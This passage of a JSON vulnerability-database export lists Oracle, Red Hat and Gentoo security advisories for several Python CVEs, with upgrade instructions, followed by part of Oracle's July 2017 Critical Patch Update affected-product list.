added\npython27-python-setuptools\n[0.9.8-3]\n- Enhance patch restoring proxy support in SSL connections\nResolves: rhbz#1222507\npython27-python-simplejson\n[3.2.0-2]\n- Fix CVE-2014-461, add boundary checks\nResolves: rhbz#1222534\npython27-python-wheel\n - New Package added ", "edition": 3, "reporter": "Oracle", "published": "2016-02-04T00:00:00", "title": "python27 security, bug fix, and enhancement update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2016-02-04T00:00:00", "id": "ELSA-2015-1064", "href": "http://linux.oracle.com/errata/ELSA-2015-1064.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T19:42:59", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "python-debuginfo", "packageFilename": "python-debuginfo-2.6.6-64.el6.i686.rpm", "operator": "lt"}], "description": "Python is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes, users\nare directed to the following article on the Red Hat Customer Portal:\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement.\n", "reporter": "RedHat", "published": "2015-07-22T04:00:00", "type": "redhat", "title": "(RHSA-2015:1330) Moderate: python security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-1752", "CVE-2014-1912", "CVE-2014-4650", "CVE-2014-7185"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:24", "id": "RHSA-2015:1330", "href": "https://access.redhat.com/errata/RHSA-2015:1330", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T19:43:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.0-2.el6", "arch": "x86_64", "packageName": "python27-python-simplejson-debuginfo", "packageFilename": "python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm", "operator": "lt"}], "description": "Python is an interpreted, interactive, object-oriented programming language\nthat supports modules, classes, exceptions, high-level dynamic data types,\nand dynamic typing. The python27 collection provide a stable release of\nPython 2.7 with a number of additional utilities and database connectors\nfor MySQL and PostgreSQL.\n\nThe python27-python packages have been upgraded to upstream version 2.7.8,\nwhich provides numerous bug fixes over the previous version. (BZ#1167912)\n\nThe following security issues were fixed in the python27-python component:\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThe following security issue was fixed in the python27-python and\npython27-python-simplejson components:\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nIn addition, this update adds the following enhancement:\n\n* The python27 Software Collection now includes the python-wheel and\npython-pip modules. (BZ#994189, BZ#1167902)\n\nAll python27 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. All running python27\ninstances must be restarted for this update to take effect.\n", "reporter": "RedHat", "published": "2015-06-04T04:00:00", "type": "redhat", "title": "(RHSA-2015:1064) Moderate: python27 security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-13T01:28:19", "id": "RHSA-2015:1064", "href": "https://access.redhat.com/errata/RHSA-2015:1064", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:48", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1752", "https://bugs.gentoo.org/show_bug.cgi?id=505068", "https://bugs.gentoo.org/show_bug.cgi?id=495224", "https://bugs.gentoo.org/show_bug.cgi?id=500518", "https://bugs.gentoo.org/show_bug.cgi?id=514686", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1912", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2667", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-7338", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4616", "https://bugs.gentoo.org/show_bug.cgi?id=523792", "https://bugs.gentoo.org/show_bug.cgi?id=532232", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9365", "https://bugs.gentoo.org/show_bug.cgi?id=506084", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7185"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.3.5-r1", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "dev-lang/python", "operator": "lt"}], "edition": 1, "description": "### Background\n\nPython is an interpreted, interactive, object-oriented programming language. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker may be able to execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Python 3.3 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-3.3.5-r1\"\n \n\nAll Python 2.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-2.7.9-r1\"", "reporter": "Gentoo Foundation", "published": "2015-03-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Python: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912", "CVE-2014-2667", "CVE-2013-7338", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-9365"], "modified": "2015-06-17T00:00:00", "id": "GLSA-201503-10", "href": "https://security.gentoo.org/glsa/201503-10", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oracle": [{"lastseen": "2018-08-31T04:13:54", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 310 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2282980.1>).\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "edition": 3, "reporter": "Oracle", "published": "2018-03-20T00:00:00", "title": "Oracle Critical Patch Update - July 2017", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle Data Integrator", "version": "12.2.1.0.0", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.3.0.0", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.6.1.0", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "6.0.x", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "14.0.4", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.4", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.6", "operator": "le"}, {"name": "Java Advanced Management Console", "version": "2.6", "operator": "le"}, {"name": "MySQL Cluster", "version": "7.3.5", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.3.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4.1", "operator": "le"}, {"name": "Oracle Policy Automation", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Hospitality Simphony First Edition", "version": "1.7.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u141", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.2.7.1204", "operator": "le"}, {"name": "Oracle Tuxedo", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Retail Warehouse Management System", "version": "14.0.4", "operator": "le"}, {"name": "MySQL Connectors", "version": "5.3.7", "operator": "le"}, {"name": "Oracle Communications Convergence", "version": "3.0", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "6.1", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "14.1.3", "operator": "le"}, {"name": "Oracle Hospitality Cruise Fleet Management", "version": "9.0", "operator": "le"}, {"name": "Oracle Web Analytics", "version": "12.1.2", "operator": "le"}, {"name": "Financial Services Behavior Detection Platform", "version": "8.0.1", "operator": "le"}, {"name": "Primavera Gateway", "version": "15.2", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Tuxedo System and Applications Monitor", "version": "11.1.1.2.1", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "15.0.x", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Web Analytics", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Hospitality Simphony", "version": "2.9", "operator": "le"}, {"name": "Primavera Gateway", "version": "15.1", "operator": "le"}, {"name": "Solaris Cluster", "version": "4", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Hospitality Inventory Management", "version": "9.0.0", "operator": "le"}, {"name": "Primavera Gateway", "version": "1.1", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Web Analytics", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Secure Enterprise Search", "version": "11.2.2.2.0", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.4", "operator": "le"}, {"name": "Primavera Gateway", "version": "1.0", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "13.1.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u131", "operator": "le"}, {"name": "Oracle Hospitality e7", "version": "4.2.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.6", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.4.1.x", "operator": "le"}, {"name": "BI Publisher", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Web Analytics", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "6.5.x", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "12.0.1", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "15.2", "operator": "le"}, {"name": "Oracle Tuxedo System and Applications Monitor", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.4.0", "operator": "le"}, {"name": "Oracle Communications Network Charging and Control", "version": "5.0.2.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle Payment Interface", "version": "6.1.1", "operator": "le"}, {"name": "Oracle Retail Warehouse Management System", "version": "15.0.1", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "5.2", "operator": "le"}, {"name": "Hospitality Hotel Mobile", "version": "1.05", "operator": "le"}, {"name": "Oracle General Ledger", "version": "12.1.1", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.55", "operator": "le"}, {"name": "PeopleSoft Enterprise PRTL Interaction Hub", "version": "9.1.0", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Hospitality Simphony", "version": "2.8", "operator": "le"}, {"name": "MICROS PC Workstation 2015", "version": "1302h", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.6.0.0", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.2.5.1141", "operator": "le"}, {"name": "Java SE", "version": "7u141", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.4", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.1.0", "operator": "le"}, {"name": "Primavera Unifier", "version": "15.1", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.4.0.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Hospitality Property Interfaces", "version": "8.10.x", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u131", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "8.3", "operator": "le"}, {"name": "Hospitality WebSuite8 Cloud Service", "version": "8.10.x", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.4.0.x", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.1.2", "operator": "le"}, {"name": "BI Publisher", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle General Ledger", "version": "12.2.5", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "13.3.1", "operator": "le"}, {"name": "Oracle Business Transaction Management", "version": "12.1.x", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "5.1", "operator": "le"}, {"name": "Oracle Enterprise Repository", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.4", "operator": "le"}, {"name": "Solaris", "version": "11", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "11.4.0", "operator": "le"}, {"name": "Oracle Communications Network Charging and Control", "version": "5.0.0.2", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.2", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.1.2", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "16.0.1", "operator": "le"}, {"name": "Oracle Hospitality Cruise Dining Room Management", "version": "8.0.75", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "Oracle OpenSSO", "version": "3.0.0.8", "operator": "le"}, {"name": "Oracle Policy Automation", "version": "12.1.0", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "5.3", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.2.0", "operator": "le"}, {"name": "Oracle General Ledger", "version": "12.2.3", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Banking Platform", "version": "2.5", "operator": "le"}, {"name": "Primavera Gateway", "version": "16.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.36", "operator": "le"}, {"name": "Oracle Hospitality Suites Management", "version": "3.7", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Oracle General Ledger", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Retail Workforce Management", "version": "1.64.0", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.2.6", "operator": "le"}, {"name": "Oracle API Gateway", "version": "11.1.2.4.0", "operator": "le"}, {"name": "Oracle Hospitality Materials Control", "version": "8.31.4", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.1.5.7958", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Enterprise Repository", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Primavera Unifier", "version": "10.2", "operator": "le"}, {"name": "Oracle Communications Network Charging and Control", "version": "5.0.0.1", "operator": "le"}, {"name": "Oracle Communications Session Router", "version": "740", "operator": "le"}, {"name": "Oracle Traffic Director", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Real Application Clusters", "version": "11.2.0.4", "operator": "le"}, {"name": "MySQL Connectors", "version": "6.1.9", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "8.4", "operator": "le"}, {"name": "Oracle Hospitality Simphony First Edition Venue Management", "version": "3.9", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Policy Automation", "version": "12.2.3", "operator": "le"}, {"name": "Oracle General Ledger", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Application Testing Suite", "version": "12.5.0.3", "operator": "le"}, {"name": "Primavera Unifier", "version": "10.1", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "15.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.18", "operator": "le"}, {"name": "Oracle Business Transaction Management", "version": "11.1.x", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "2.2.0", "operator": "le"}, {"name": "Oracle Hospitality Cruise AffairWhere", "version": "2.2.05.062", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Tuxedo System and Applications Monitor", "version": "12.1.1.1.0", "operator": "le"}, {"name": "Oracle Hospitality Cruise Materials Management", "version": "7.30.562", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.2.4", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "2.0.1", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "2.0.0", "operator": "le"}, {"name": "Oracle Retail Workforce Management", "version": "1.60.7", "operator": "le"}, {"name": "Oracle Policy Automation", "version": "12.2.1", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.35", "operator": "le"}, {"name": "DBMS_LDAP", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Tuxedo System and Applications Monitor", "version": "11.1.1.2.2", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "16.2", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.5", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.1.1", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.4", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "6u151", "operator": "le"}, {"name": "Oracle Hospitality Inventory Management", "version": "8.5.1", "operator": "le"}, {"name": "Oracle Communications Network Charging and Control", "version": "5.0.1.0", "operator": "le"}, {"name": "Hospitality Hotel Mobile", "version": "1.01", "operator": "le"}, {"name": "Primavera Gateway", "version": "14.2", "operator": "le"}, {"name": "Financial Services Behavior Detection Platform", "version": "8.0.2", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "15.1", "operator": "le"}, {"name": "Primavera Unifier", "version": "9.14", "operator": "le"}, {"name": "Oracle Application Testing Suite", "version": "12.5.0.2", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "6.0", "operator": "le"}, {"name": "Oracle Hospitality Cruise Shipboard Property Management System", "version": "8.0.0.0", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Banking Platform", "version": "2.3", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "13.2.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "6.1.4", "operator": "le"}, {"name": "MICROS BellaVita", "version": "2.7.x", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.0", "operator": "le"}, {"name": "Siebel Core CRM", "version": "17.0", "operator": "le"}, {"name": "Oracle Traffic Director", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Direct Banking", "version": "12.0.3", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "16.1", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.4.3.x", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.2.1.2", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "11.5", "operator": "le"}, {"name": "Oracle Retail Warehouse Management System", "version": "14.1.3", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.5", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "11.3.0", "operator": "le"}, {"name": "Oracle Hospitality Guest Access", "version": "4.2.0.0", "operator": "le"}, {"name": "Siebel Core CRM", "version": "16.0", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Hospitality Materials Control", "version": "8.32.0", "operator": "le"}, {"name": "DBMS_LDAP", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.1", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.3", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.6.1", "operator": "le"}, {"name": "Oracle Banking Platform", "version": "2.4.1", "operator": "le"}, {"name": "Hospitality Suite8", "version": "8.10.x", "operator": "le"}, {"name": "Oracle Communications Network Charging and Control", "version": "4.4.1.5", "operator": "le"}, {"name": "RDBMS Security", "version": "12.1.0.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u141", "operator": "le"}, {"name": "Oracle Policy Automation", "version": "12.2.0", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Hospitality Reporting and Analytics", "version": "8.5.1", "operator": "le"}, {"name": "Application Server", "version": "12.1.3", "operator": "le"}, {"name": "Oracle General Ledger", "version": "12.2.6", "operator": "le"}, {"name": "Oracle REST Data Services", "version": "3.0.10.25.02.36", "operator": "le"}, {"name": "Java SE", "version": "6u151", "operator": "le"}, {"name": "Sun ZFS Storage Appliance Kit (AK)", "version": "2013", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.5", "operator": "le"}, {"name": "Oracle Enterprise Data Quality", "version": "8.1.13.0.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.4.1", "operator": "le"}, {"name": "Primavera Unifier", "version": "9.13", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.6", "operator": "le"}, {"name": "Hospitality Hotel Mobile", "version": "1.1", "operator": "le"}, {"name": "Oracle Tuxedo System and Applications Monitor", "version": "11.1.1.2.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.2.1.1", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.5", "operator": "le"}, {"name": "BI Publisher", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Java SE", "version": "8u131", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.16", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Hospitality 9700", "version": "4.0", "operator": "le"}, {"name": "Oracle Web Analytics", "version": "12.2.5", "operator": "le"}, {"name": "MICROS Workstation 650", "version": "1500n", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Hospitality RES 3700", "version": "5.5", "operator": "le"}, {"name": "Oracle General Ledger", "version": "12.1.2", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.3.3.1199", "operator": "le"}, {"name": "Oracle Communications EAGLE LNP Application Processor", "version": "10.0", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.3", "operator": "le"}, {"name": "Primavera Unifier", "version": "15.2", "operator": "le"}, {"name": "Application Management Pack for Oracle E-Business Suite", "version": "13.1.1.1.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Communications Session Router", "version": "730", "operator": "le"}, {"name": "Oracle Web Analytics", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Retail Customer Insights", "version": "15.0", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "7.0.x", "operator": "le"}, {"name": "Oracle Communications BRM", "version": "11.3.0.0.0", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "5.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.1.24", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Enterprise Session Border Controller", "version": "7.3.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Primavera Unifier", "version": "16.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.4.2", "operator": "le"}, {"name": "Oracle Explorer", "version": "8.16", "operator": "le"}, {"name": "Oracle Communications Convergence", "version": "3.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.7.1", "operator": "le"}, {"name": "Oracle Banking Platform", "version": "2.4", "operator": "le"}, {"name": "PeopleSoft Enterprise FSCM", "version": "9.2", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.3", "operator": "le"}, {"name": 